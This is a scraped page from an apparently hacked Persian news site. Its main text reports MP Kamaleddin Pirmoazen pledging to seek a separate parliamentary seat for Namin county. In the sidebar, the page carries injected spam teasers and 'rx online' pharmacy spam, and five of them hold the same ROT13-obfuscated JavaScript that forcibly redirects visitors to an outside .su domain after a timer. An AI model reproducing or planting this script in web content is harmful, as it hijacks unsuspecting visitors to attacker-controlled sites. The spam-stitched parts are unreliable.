301 Moved Permanently


nginx/1.15.9 (Ubuntu)
یقین بدانید پیگیر تخصیص نماینده مستقل برای شهرستان نمین می باشم : نوجه ده نیوز NojehdehNews@
rx online

کمال الدین پیرموذن٬ عصر روز پنج شنبه در جمع اهالی شهرستان نمین از پیگیری مطالبات به حق مردم برای تخصیص نماینده مستقل به شهرستان نمین خبر داد.

pirmoazen کمال الدین پیرموذن
 به گزارش خبرنگار پایگاه خبری تحلیلی آسبینه٬ نماینده مردم اردبیل٬ نمین٬ نیر و سرعین ضمن تشکر و قدردانی از مسوولان شهرستان اعم از فرماندار٬ شهردار و اعضای شورای اسلامی شهر نمین و روستاهای شهرستان و از عموم اهالی فرهنگ دوست نمین به جهت اهمیت دادن به موضوع تخصیص نماینده مستقل به شهرستان و پیگیری مجدانه و مصرانه مطالبات به حق خود تجلیل نمود.
پیرموذن در ادامه گفت: سالهاست که اهالی متدین سنی و شیعه بخاطر ادب و شخصیت والایشان در کنار یکدیگر بخوبی زندگی و معاشرت می نمایند که این موضوع قابل تحسین و ستایش است .
وی دولت و مجلس را دو عامل اصلی و مهم جهت تحقق مطالبه بحق مردم برای تخصیص نماینده مستقل به شهرستان نمین برشمرد و اذعان داشت: زنده یاد سید ابوالفضل اقبالی نمین در دوره ۲۱ مجلس شورای ملی بعنوان نماینده مستقل نمین در مجلس شورای ملی حضور داشته است و ایشان خدمات خیر و نیکی در منطقه به یادگار نهاده ازجمله احداث درمانگاه و استقرار بخشداری در نمین و ترمیم جاده ی گردنه حیران و لوله کشی آب آشامیدنی و … از مهم ترین فعالیت های ماندگار آن مرحوم می باشد. وی خاطرنشان کرد: ولی متاسفانه با این اوصاف تاکنون نمین تنها مرکز شهرستان استان می باشد که هنوز پروژه احداث فاضلاب شهری آن به سرانجام نرسیده است و این مسئله بسیار ناراحت کننده ومایه تاسف است.
pirmoazen کمال الدین پیرموذن
وی افزود: با این حال که شهرستان نمین از نظر ادب و فرهنگ سرآمد استان اردبیل است و از ویژگی های منحصر به فردی در زمینه های نیروی انسانی، طبیعی٬ گردشگری، آموزش عالی، اقتصادی٬ صنعتی و معدنی برخوردار است هنوز بخوبی رشد و توسعه نیافته و محروم و مظلوم واقع شده است.به حق که نمین قطعه ای از بهشت است.
عضو فراکسیون صنایع و معادن مجلس اذعان داشت: از عوامل اجرایی جشنواره سراسری عکس طبیعت نمین آقایان علی حقی ٬ پیام خدادادی٬ ابراهیم ابراهیمی و دبیر این جشنواره خانم زهرا رسولزاده نمین که در سالجاری بزرگترین رویداد فرهنگی و هنری در منطقه را برگزار نمودند تشکر و تجلیل می نمایم که این موضوع باعث تبلیغ جاذبه های بالقوه گردشگری و طبیعی این شهرستان شده است.
به گزارش آسبینه٬ عضو فراکسیون رهروان ولایت خطاب به حضار اظهار داشت: تمامی نمایندگان باید در خصوص اختصاص نماینده مستقل به شهرستان نمین همکاری و همدلی لازم را داشته باشند، چون نمین بحق حائز شرایط برخورداری از نماینده مستقل مجلس در بین شهرستان های استان می باشد.
pirmoazen کمال الدین پیرموذن
پیرموذن٬ نمین را خطه هنرمندان و تمدن سازان و دیار اولین‌ها از لحاظ فرهنگ و ادب و علم دانست و تاکید کرد: شما مردم یقین بدانید که بنده در کنار خواسته و مطالبه بحق شما هستم و بشخصه پیگیر اختصاص نماینده مستقل به شهرستان نمین می باشم.

عضو مجمع نمایندگان استان بیان داشت: بیشتر سعی بنده این است که یارشاطر نمینی های ارزشمند باشم، نه بار خاطر آنها. وی خود را از نوکران و خادمان ولایت و اهالی منطقه و یار و مددکار دولت تدبیر و امید معرفی کرد. ایشان افزودند: متاسفانه امروزه حق گرفتنی است نه دادنی! و این حق مردم است که به حقوق قانونی خود برسند. می بایست تمامی نمینی ها و مسوولان کمک کنند تا به این خواسته و مطالبه به حق برسیم. وی خواستار بکارگیری قدرت چانه زنی و رایزنی ها و ارتباطات برای تخصیص سهمیه‌ی نماینده مستقل شهرستان نمین از جانب شهروندان و فرهیختگان نمینی شد.کمال الدین پیرموذن خاطرنشان کرد: با تمام توان پیگیر مسائل اقتصادی٬ گردشگری و محیط زیست شهرستان نمین می باشم. وی به ظرفیتهای صنعتی و معدنی شهرستان اشاره کرد و گفت: استاندار نیز بجد پیگیر راه اندازی منطقه ویژه اقتصادی نمین است و هر سه نمایندگان اردبیل پیگیر خواسته های شما می باشند و به آن اهتمام می ورزند و امیدوارم با حمایت مجمع نمایندگان و استاندار به خواسته خود برسید.

pirmoazen کمال الدین پیرموذن

عضو هیئت رئیسه فراکسیون محیط زیست مجلس گفت: موضوع تخریب گسترده محیط زیست منطقه و ویلاسازی در گردنه ی حیران را از طریق کمیسیون مربوطه پیگیر و قبلا نیز در صحن علنی مجلس به این مسئله اعتراض نموده و تذکر داده ام.

به گزارش آسبینه٬ این نماینده مجلس ابراز داشت: نمین آینه تمام نمای طبیعت ٬ تاریخ و مدنیت بوده و علم و آموزش اول بار در این منطقه از استان اردبیل رشد و نشر یافته است. وی با ابیاتی از مرحوم شهاب اذرتاش نمین سخنانش را به پایان رساند:

شبانگاهی نگاهم بر شفق بود …. به گوش اندر ندای مرغ حق بود

بگفت این چنین٬ مرغ شباهنگ …. خوشا بر زادگاهت «مهد فرهنگ»

به کش کوچک و در کیف بالا …. به خود پرورده فرزندان والا

به دامن پرورانده مرزداران …. بلند آوازگان باب ایران

نشان و نام دارد پیشگامش …. به مصداقش «نمین» گردیده نامش

pirmoazen کمال الدین پیرموذن

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin
  • Youtube

Solheim Cup podcast: Anne Van Dam, Suzann Pettersen among guests

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Listen or subscribe on: Suzann Pettersen and ...

The most backed teams in the EFL Cup tonight

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); SWANSEA to beat at Watford Punters fancy ...

Burrow is the Odds-On Favorite to be the First Overall Pick in the 2020 NFL Draft

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); The 2019 school football season opened ...

Is Online Sports Betting Legal in New Mexico?

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Legal sports gambling has arrived in ...

Alex Iwobi feels like he has a 'new home' at Everton after Deadline Day move

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Alex Iwobi feels like he has ...

توييتر ما

No public Twitter messages.

حاميان ما